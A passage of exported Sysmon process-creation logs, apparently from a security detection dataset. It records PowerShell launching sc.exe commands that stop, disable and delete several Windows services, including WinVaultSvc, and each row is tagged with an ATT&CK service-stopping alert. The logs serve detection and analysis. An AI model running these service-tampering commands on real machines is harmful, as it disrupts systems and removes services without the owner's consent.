\""C:\\Windows\\system32\\sc.exe\"" Stop Xtfya\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:49:35.012"",""processGuid"":""{df9fc3d3-b35f-5ecf-0000-00102e701900}"",""processId"":""6228"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® 
Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop Xtfya"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:03.368",8,"ATT&CK: Quick Execution of a Series of Suspicious Commands","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:49:35.000 +ProcessGuid: {df9fc3d3-b35f-5ecf-0000-0010646f1900} +ProcessId: 7076 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Config Xtfya Start= Disabled +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 
+ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Config Xtfya Start= Disabled",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:49:35.003416300Z"",""eventRecordID"":""2122"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:49:35.000\r\nProcessGuid: {df9fc3d3-b35f-5ecf-0000-0010646f1900}\r\nProcessId: 7076\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Config Xtfya Start= Disabled\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 
12:49:35.000"",""processGuid"":""{df9fc3d3-b35f-5ecf-0000-0010646f1900}"",""processId"":""7076"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Config Xtfya Start= Disabled"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:03.337",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:49:34.974 +ProcessGuid: {df9fc3d3-b35e-5ecf-0000-0010d26d1900} +ProcessId: 6836 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop Xtfy +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: 
MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop Xtfy",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:49:34.976068500Z"",""eventRecordID"":""2120"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:49:34.974\r\nProcessGuid: {df9fc3d3-b35e-5ecf-0000-0010d26d1900}\r\nProcessId: 6836\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop Xtfy\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: 
C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:49:34.974"",""processGuid"":""{df9fc3d3-b35e-5ecf-0000-0010d26d1900}"",""processId"":""6836"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop Xtfy"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:03.290",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:49:34.942 +ProcessGuid: {df9fc3d3-b35e-5ecf-0000-0010776b1900} +ProcessId: 6208 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop WinVaultSvc +CurrentDirectory: 
C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop WinVaultSvc",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:49:34.943902200Z"",""eventRecordID"":""2117"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:49:34.942\r\nProcessGuid: {df9fc3d3-b35e-5ecf-0000-0010776b1900}\r\nProcessId: 6208\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop WinVaultSvc\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: 
MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:49:34.942"",""processGuid"":""{df9fc3d3-b35e-5ecf-0000-0010776b1900}"",""processId"":""6208"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop WinVaultSvc"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:03.244",8,"ATT&CK: Quick Execution of a Series of Suspicious Commands","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:49:34.922 +ProcessGuid: {df9fc3d3-b35e-5ecf-0000-0010e5691900} +ProcessId: 5076 +Image: C:\Windows\System32\sc.exe +FileVersion: 
10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Delete SvcNlauser +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Delete SvcNlauser",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:49:34.924156000Z"",""eventRecordID"":""2115"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:49:34.922\r\nProcessGuid: {df9fc3d3-b35e-5ecf-0000-0010e5691900}\r\nProcessId: 5076\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Delete SvcNlauser\r\nCurrentDirectory: C:\\Users\\John 
Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:49:34.922"",""processGuid"":""{df9fc3d3-b35e-5ecf-0000-0010e5691900}"",""processId"":""5076"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Delete SvcNlauser"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:03.216",8,"ATT&CK T1489: Stop Windows Service","""Process 
Create: +RuleName: +UtcTime: 2020-05-28 12:49:34.912 +ProcessGuid: {df9fc3d3-b35e-5ecf-0000-00101c691900} +ProcessId: 1552 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop SvcNlauser +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop SvcNlauser",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:49:34.915238800Z"",""eventRecordID"":""2114"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:49:34.912\r\nProcessGuid: {df9fc3d3-b35e-5ecf-0000-00101c691900}\r\nProcessId: 1552\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft 
Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop SvcNlauser\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:49:34.912"",""processGuid"":""{df9fc3d3-b35e-5ecf-0000-00101c691900}"",""processId"":""1552"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop SvcNlauser"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John 
Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:03.151",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:49:34.882 +ProcessGuid: {df9fc3d3-b35e-5ecf-0000-0010c0661900} +ProcessId: 6000 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop ""Windows Managers"" +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop \""Windows 
Managers\""",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:49:34.884322500Z"",""eventRecordID"":""2111"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:49:34.882\r\nProcessGuid: {df9fc3d3-b35e-5ecf-0000-0010c0661900}\r\nProcessId: 6000\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop \""Windows Managers\""\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 